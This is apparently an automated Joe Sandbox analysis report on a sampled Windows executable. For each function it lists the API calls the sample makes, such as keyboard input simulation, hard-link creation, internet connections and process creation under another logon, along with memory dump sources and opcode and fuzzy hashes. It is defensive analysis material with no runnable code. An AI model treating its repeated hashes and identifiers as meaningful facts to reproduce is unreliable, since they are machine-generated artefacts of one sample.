                                                                                                                                  • Instruction ID: 8fe37a3bf710dcf98847533f419160d95235c3dc8adcab32e34cd567464e941d
                                                                                                                                  • Opcode Fuzzy Hash: 35ce6426d33dedbbc19f24fd35c9ea634ae24ad3ba669a6b8bee2825f47567b8
                                                                                                                                  • Instruction Fuzzy Hash: 5D514F75900209EFDF20DF68C880AAE7BB6FB45360F248659F925DB291D770ED41EB90
                                                                                                                                  Function 00EDD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EDD258
                                                                                                                                  • __itow.LIBCMT ref: 00EDD292
                                                                                                                                    • Part of subcall function 00EDD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EDD549
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EDD2FB
                                                                                                                                  • __itow.LIBCMT ref: 00EDD350
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  • Opcode ID: 252d58e4197a70bc6421b63db1a855898b4a5dc40d755f73051d693a9e12e697
                                                                                                                                  • Instruction ID: 0181cfc5a2ba7bb5198bc4ce2eedfefa1f5d556f659a7bcee2b873d12c1eeed1
                                                                                                                                  • Opcode Fuzzy Hash: 252d58e4197a70bc6421b63db1a855898b4a5dc40d755f73051d693a9e12e697
                                                                                                                                  • Instruction Fuzzy Hash: F5416171A04209ABDF11DF94CC42BEE7BF9EF49710F00101AFA05B7291DB75AA46CB52
                                                                                                                                  Function 00EEEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEEF32
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00EEEF58
                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEEF7D
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEEFA9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                  • Opcode ID: 6106151d57003834b17b62547195a1418746b519d5daedfdbd0ec6d2a8aafc66
                                                                                                                                  • Instruction ID: 073f8a38b4b43bc419206971cfd6e129558d6a33ea30d4162e80aac305100eb5
                                                                                                                                  • Opcode Fuzzy Hash: 6106151d57003834b17b62547195a1418746b519d5daedfdbd0ec6d2a8aafc66
                                                                                                                                  • Instruction Fuzzy Hash: C9413639600615DFCB20EF15CA45A59BBE5EF8D320B199088E95ABF362CB30FD41DB91
                                                                                                                                  Function 00F0B354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  • Opcode ID: 29cc89e0e9cb2865ae30a33caa8810f8b974f1428df6e00326f61528b0779805
                                                                                                                                  • Instruction ID: 06b455f784f5259b457b86dbc9c01bc4ae271717a123629d35ddc8b771f5d26a
                                                                                                                                  • Opcode Fuzzy Hash: 29cc89e0e9cb2865ae30a33caa8810f8b974f1428df6e00326f61528b0779805
                                                                                                                                  • Instruction Fuzzy Hash: 2131BE39A40208FBEF34DF58CC85BAC3BA5AB05360F648512FA51D72E2C770EA41BB51
                                                                                                                                  Function 00F0D5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0D617
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0D68D
                                                                                                                                  • PtInRect.USER32(?,?,00F0EB2C), ref: 00F0D69D
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00F0D70E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                  • Opcode ID: d1a54a37fdffe83f40d56ebf94f9e1df6816541cdec3c026ea3f0409191323cd
                                                                                                                                  • Instruction ID: a794b948717de426c711b0fa39e78554692d8d7319c08e578c69156ff7446e0e
                                                                                                                                  • Opcode Fuzzy Hash: d1a54a37fdffe83f40d56ebf94f9e1df6816541cdec3c026ea3f0409191323cd
                                                                                                                                  • Instruction Fuzzy Hash: D2414935A00119DFCB11DFA8D884BA97BF5BF49310F1881AAE419DB291D771E941FF50
                                                                                                                                  Function 00EE4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EE44EE
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE450A
                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00EE456A
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EE45C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  • Opcode ID: 954961f0c45c09bee6f33c7e8d6aaaa4c4eac37d1e4123a490cdc238258aac79
                                                                                                                                  • Instruction ID: b1eb85b6fffc0b614c93e1d0f9afb0c1a3708f5a09774453b505db5e52500c3f
                                                                                                                                  • Opcode Fuzzy Hash: 954961f0c45c09bee6f33c7e8d6aaaa4c4eac37d1e4123a490cdc238258aac79
                                                                                                                                  • Instruction Fuzzy Hash: 8331F4F1A002DC5BEF349B669809BFE7BA5AB49318F04115AF081732C1C7749A499761
                                                                                                                                  Function 00ED4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00ED4DE8
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00ED4E16
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00ED4E44
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00ED4E7A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  • Opcode ID: a74f126e0c6b8f063f310b4a4f410b01f3fb52727c623b41d582d5726d136f84
                                                                                                                                  • Instruction ID: 884f8de34317c436cd5c2b587f15cdd6772bafbed14648578bd48f77c616c716
                                                                                                                                  • Opcode Fuzzy Hash: a74f126e0c6b8f063f310b4a4f410b01f3fb52727c623b41d582d5726d136f84
                                                                                                                                  • Instruction Fuzzy Hash: F331E171600206BFDF219F74C845BAA7BA6FF51314F15552AE821AB2E0E730DC52DB90
                                                                                                                                  Function 00F07AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00F07AB6
                                                                                                                                    • Part of subcall function 00EE69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE69E3
                                                                                                                                    • Part of subcall function 00EE69C9: GetCurrentThreadId.KERNEL32 ref: 00EE69EA
                                                                                                                                    • Part of subcall function 00EE69C9: AttachThreadInput.USER32(00000000,?,00EE8127), ref: 00EE69F1
                                                                                                                                  • GetCaretPos.USER32(?), ref: 00F07AC7
                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00F07B00
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00F07B06
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                  • Opcode ID: 7d8d692e1ad2db68b61fa8205faf4dfa74777ed0442eb64feae9378f107972ca
                                                                                                                                  • Instruction ID: 3bff35199b91947dfc452737a3f9080d8a5e535998cdc14a4529edf7da9b0745
                                                                                                                                  • Opcode Fuzzy Hash: 7d8d692e1ad2db68b61fa8205faf4dfa74777ed0442eb64feae9378f107972ca
                                                                                                                                  • Instruction Fuzzy Hash: 5431FF72D00108AFCB10EFB5DC859EFBBFDEF58314B10906AE915E7211D635AE059BA1
                                                                                                                                  Function 00EF497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EF49B7
                                                                                                                                    • Part of subcall function 00EF4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EF4A60
                                                                                                                                    • Part of subcall function 00EF4A41: InternetCloseHandle.WININET(00000000), ref: 00EF4AFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1463438336-0
                                                                                                                                  • Opcode ID: 15b72a36aadb35b4d3e4c8d79d1fd7f9315acc1e9b68d8e544fe20e5ac2ac3b6
                                                                                                                                  • Instruction ID: 4e96bb5c653e747ea088d27988eca7df4c6706b2c44fc1b6ab11855b4faf1061
                                                                                                                                  • Opcode Fuzzy Hash: 15b72a36aadb35b4d3e4c8d79d1fd7f9315acc1e9b68d8e544fe20e5ac2ac3b6
                                                                                                                                  • Instruction Fuzzy Hash: BA21D772240A09BFDB119F608C00FBBBBA9FF88710F10501AFB15E6590EB71D411A794
                                                                                                                                  Function 00EDBC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EDBCD9
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00EDBCE0
                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00EDBCFA
                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EDBD29
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2621361867-0
                                                                                                                                  • Opcode ID: eca552ac3ceaa4edb5f9157b0fe9e99ccf708348ec44def4a03247c67510934c
                                                                                                                                  • Instruction ID: cd4639eaf99c9612e4f201c08d297e33d5497d7590ff8d0439f3c90c603505cf
                                                                                                                                  • Opcode Fuzzy Hash: eca552ac3ceaa4edb5f9157b0fe9e99ccf708348ec44def4a03247c67510934c
                                                                                                                                  • Instruction Fuzzy Hash: B621497210020DEBDF119FA8DD49FEE7BA9EF44308F155026FA01A6260D7768D62EB60
                                                                                                                                  Function 00F08834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F088A3
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F088BD
                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F088CB
                                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F088D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169480361-0
                                                                                                                                  • Opcode ID: 4955836fe7c54c33469ca595f85c0b287d4ab780563f63ad0f8e1bc14a3aace8
                                                                                                                                  • Instruction ID: 297f12e7c77aadf6d3048d045a2ebbefe900d8fcdf55ffd2853d3fbdd0e06870
                                                                                                                                  • Opcode Fuzzy Hash: 4955836fe7c54c33469ca595f85c0b287d4ab780563f63ad0f8e1bc14a3aace8
                                                                                                                                  • Instruction Fuzzy Hash: E5118E31205114AFDB14AB28CC05FAA7BE9EF86360F148119F956DB2E1CB70BD02EB90
                                                                                                                                  Function 00EF900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00EF906D
                                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00EF907F
                                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 00EF908C
                                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00EF90A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 385091864-0
                                                                                                                                  • Opcode ID: e14f83089f32e9642d9a01f63a27024d76729e5fb9b8a5eb8e486b1b5db065e0
                                                                                                                                  • Instruction ID: cc8e5b660ed88ad0ff4e58d290a6c8d25ed2101b1a27e57ad2547bc21baffd5b
                                                                                                                                  • Opcode Fuzzy Hash: e14f83089f32e9642d9a01f63a27024d76729e5fb9b8a5eb8e486b1b5db065e0
                                                                                                                                  • Instruction Fuzzy Hash: AD2154719011289FCB20DF69CC85ADABBFCEF49750F10816AF949E7291DA749A41CBA0
                                                                                                                                  Function 00EE18E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?), ref: 00EE2CB9
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrcpyW.KERNEL32(00000000,?,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE2CDF
                                                                                                                                    • Part of subcall function 00EE2CAA: lstrcmpiW.KERNEL32(00000000,?,00EE18FD,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?), ref: 00EE2D10
                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE1916
                                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE193C
                                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00EE26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00EE1970
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                  • String ID: cdecl
                                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                                  • Opcode ID: 6bd282a729a3060e2a277d01e4306d79e3efab03f8dea8aa18e630653dc3edcd
                                                                                                                                  • Instruction ID: 7b20782fcc7eb8b65ae025d9d12c48848ade367b6d5a632b388306b484264d38
                                                                                                                                  • Opcode Fuzzy Hash: 6bd282a729a3060e2a277d01e4306d79e3efab03f8dea8aa18e630653dc3edcd
